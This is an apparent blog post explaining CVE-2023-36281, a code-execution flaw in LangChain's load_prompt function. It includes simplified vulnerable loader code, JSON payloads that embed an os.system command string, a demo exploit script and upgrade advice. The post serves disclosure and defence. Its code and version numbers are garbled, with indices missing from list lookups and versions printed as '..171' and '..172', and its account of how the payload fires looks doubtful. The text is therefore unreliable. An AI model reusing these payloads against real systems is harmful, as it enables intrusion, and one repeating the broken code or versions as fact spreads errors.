LangChain is a popular open-source framework for developing applications powered by large language models (LLMs). But, in June 2023, a critical vulnerability – CVE-2023-36281 – was discovered in version ..171 that allows remote attackers to execute arbitrary code just by loading a crafted JSON file with the load_prompt method.
This post breaks down this vulnerability in simple terms, provides example code, and explains how attackers can exploit it.
What is the Vulnerability?
LangChain's load_prompt function is designed to help developers import prompt templates from files (including JSON). In the affected version, this function uses unsafe methods like Python’s __subclasses__ and eval to reconstruct objects based only on the data in the JSON file.
If an attacker can send a JSON file with specially crafted content, LangChain may trust that JSON and execute arbitrary code on your server. This flaw springs from deserialization attacks, a common bug class where "loading" data can become "running code" if the system is careless.
Let’s look at a simplified version of what might happen inside load_prompt
import json
def load_prompt(path):
with open(path, "r") as f:
config = json.load(f)
# DANGER: Dynamically selecting classes and instantiating them
clazz = [cls for cls in object.__subclasses__() if cls.__name__ == config["class"]][]
return clazz(**config["kwargs"])
The object.__subclasses__() call retrieves all subclasses of Python's base object class — including dangerous ones like os._wrap_close, which could potentially be abused for code execution. An attacker can specify class and kwargs in the JSON so that the application ends up executing attacker-supplied code.
NOTE: This is a simplified example, but it captures the core issue.
The attacker crafts a JSON file like this
{
"class": "warning",
"kwargs": {
"message": "__import__('os').system('touch /tmp/pwned')",
"category": "UserWarning"
}
}
If the application uses eval or similar techniques to "reconstruct" objects from this JSON, the malicious payload __import__('os').system('touch /tmp/pwned') will execute on the server when this file is loaded.
Here’s an end-to-end Python demo showing how the vulnerability can be abused
import json
# Malicious JSON payload
malicious_json = '''
{
"class": "catch_warnings",
"kwargs": {
"record": false,
"module": "__import__('os').system('touch /tmp/hacked')"
}
}
'''
with open("malicious_prompt.json", "w") as f:
f.write(malicious_json)
# Function as in older langchain version
def vulnerable_load_prompt(path):
with open(path, "r") as f:
config = json.load(f)
cls = [c for c in object.__subclasses__() if c.__name__ == config["class"]][]
# Insecure: Passing raw kwargs
return cls(**config["kwargs"])
# This will execute arbitrary system command from the attacker
vulnerable_load_prompt("malicious_prompt.json")
Running this code will create a file /tmp/hacked on the system, proving the attack worked and arbitrary code was run.
References
- GitHub Advisory: GHSA-2jgw-mphw-4rg9
- MITRE CVE Database: CVE-2023-36281
- LangChain changelog with fix (v..172)
Who’s At Risk?
- Anyone running LangChain ≤ ..171 and letting users upload, supply, or modify prompt configs (JSON or YAML).
Upgrade Immediately: Update to LangChain v..172 or later. Upgrading patches this bug.
2. Never Trust User Templates: Even in new versions, don’t load arbitrary templates from unknown users.
3. Audit Custom Loading Code: If you have custom prompt loading logic, make sure you don’t use __subclasses__, eval, or similar dynamic features on user data!
4. Deploy AppArmor, Seccomp, etc.: Add defense-in-depth by restricting what your Python process can do.
Final Words
CVE-2023-36281 is a textbook example of why you should never blindly load or reconstruct Python objects from user data — especially when using features like __subclasses__ and eval.
If you use LangChain in production, immediately upgrade and audit your templates. For further reading, check the original GitHub advisory.
Timeline
Published on: 08/22/2023 19:16:36 UTC
Last modified on: 11/17/2023 19:15:08 UTC